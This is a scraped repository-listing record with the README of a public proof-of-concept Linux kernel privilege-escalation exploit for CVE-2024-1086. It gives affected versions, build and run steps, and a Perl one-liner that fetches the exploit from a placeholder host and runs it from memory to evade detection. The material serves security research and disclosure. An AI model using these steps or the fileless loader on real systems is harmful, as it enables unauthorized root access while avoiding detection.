[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-73198":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":17,"stars7d":18,"stars30d":19,"stars90d":16,"forks30d":16,"starsTrendScore":19,"compositeScore":20,"rankGlobal":10,"rankLanguage":10,"license":21,"archived":22,"fork":22,"defaultBranch":23,"hasWiki":24,"hasPages":22,"topics":25,"createdAt":10,"pushedAt":10,"updatedAt":31,"readmeContent":32,"aiSummary":33,"trendingCount":16,"starSnapshotCount":16,"syncStatus":18,"lastSyncTime":34,"discoverSource":35},73198,"CVE-2024-1086","Notselwyn\u002FCVE-2024-1086","Notselwyn","Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.","https:\u002F\u002Fpwning.tech\u002Fnftables",null,"C",2448,330,25,4,0,1,2,3,62.86,"MIT License",false,"main",true,[26,27,28,29,30],"cve","cve-2024-1086","exploit","lpe","poc","2026-06-12 04:01:08","# CVE-2024-1086\n\nUniversal local privilege escalation Proof-of-Concept exploit for [CVE-2024-1086](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2024-1086), working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.\n\nhttps:\u002F\u002Fgithub.com\u002FNotselwyn\u002FCVE-2024-1086\u002Fassets\u002F68616630\u002Fa3d43951-94ab-4c09-a14b-07b81f89b3de\n\n## Blogpost \u002F Write-up\n\nA full write-up of the exploit - including background information and loads of useful diagrams - can be found in the [Flipping Pages blogpost](https:\u002F\u002Fpwning.tech\u002Fnftables\u002F).\n\n\n## Affected versions\n\nThe exploit affects versions from (including) v5.14 to (including) v6.6, excluding patched branches v5.15.149>, v6.1.76>, v6.6.15>. The patch for these versions were released in feb 2024. The underlying vulnerability affects all versions (excluding patched stable branches) from v3.15 to v6.8-rc1.\n\n**Caveats:**\n- The exploit does not work on v6.4> kernels with kconfig `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` (including Ubuntu v6.5)\n- The exploits requires user namespaces (kconfig `CONFIG_USER_NS=y`), that those user namespaces are unprivileged (sh command `sysctl kernel.unprivileged_userns_clone` = 1), and that nf_tables is enabled (kconfig `CONFIG_NF_TABLES=y`). By default, these are all enabled on Debian, Ubuntu, and KernelCTF. Other distro's have not been tested, but may work as well. Additionally, the exploit has only been tested on x64\u002Famd64.\n- The exploit may be *very* unstable on systems with a lot of network activity\n\t- Systems with WiFi adapter, when surrounded by high-usage WiFi networks, will be very unstable. \n\t- On test devices, please turn off WiFi adapters through BIOS.\n- The kernel panic (system crash) after running the exploit is a side-effect which deliberately hasn't been fixed to prevent malicious usage of the exploit (i.e. exploitation attempts should now be more noticable, and unpractical in real-world operations). Despite this, it still allows for a working proof-of-concept in lab environments, as the root shell is functional, and persistence through disk is possible.\n\n## Usage\n\n### Configuration\n\nThe default values should work out of the box on Debian, Ubuntu, and KernelCTF with a local shell. On non-tested setups\u002Fdistros, please make sure the kconfig values match with the target kernel. These can be specified in [`src\u002Fconfig.h`](\u002Fsrc\u002Fconfig.h). If you are running the exploit on a machine with more than 32GiB physical memory, make sure to increase `CONFIG_PHYS_MEM`.\nIf you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle `CONFIG_REDIRECT_LOG` to `1` to avoid unnecessary network activity.\n\n### Building\n\nIf this is impractical for you, there is an [compiled x64 binary](https:\u002F\u002Fgithub.com\u002FNotselwyn\u002FCVE-2024-1086\u002Freleases\u002Fdownload\u002Fv1.0.0\u002Fexploit) with the default config.\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FNotselwyn\u002FCVE-2024-1086\ncd CVE-2024-1086\nmake\n```\n\nBinary: `CVE-2024-1086\u002Fexploit`\n\n\n### Running\n\nRunning the exploit is just as trivial:\n\n```bash\n.\u002Fexploit\n```\n\nFileless execution is also supported, in case of pentest situations where detections need to be avoided. However, Perl needs to be installed on the target:\n```bash\nperl -e '\n  require qw\u002Fsyscall.ph\u002F;\n\n  my $fd = syscall(SYS_memfd_create(), $fn, 0);\n  system \"curl https:\u002F\u002Fexample.com\u002Fexploit -s >&$fd\";\n  exec {\"\u002Fproc\u002F$$\u002Ffd\u002F$fd\"} \"memfd\";\n'\n```\n\n## Disclaimer\n\nThe programs and scripts (\"programs\") in this software directory\u002Ffolder\u002Frepository (\"repository\") are published, developed and distributed for educational\u002Fresearch purposes only. I (\"the creator\") do not condone any malicious or illegal usage of the programs in this repository, as the intend is sharing research and not doing illegal activities with it. I am not legally responsible for anything you do with the programs in this repository.\n","该项目是一个针对CVE-2024-1086漏洞的通用本地权限提升概念验证（PoC）利用代码，适用于大多数v5.14至v6.6版本之间的Linux内核，包括Debian、Ubuntu和KernelCTF环境。核心功能是通过利用nf_tables模块中的漏洞实现本地提权，在KernelCTF镜像中成功率高达99.4%。技术特点包括需要用户命名空间、未特权的用户命名空间克隆以及nf_tables的支持，并且在高网络活动环境下可能不稳定。此项目适用于安全研究人员在实验室环境中测试和学习该漏洞的行为，但不建议在生产环境中使用。","2026-06-11 03:44:28","high_star"]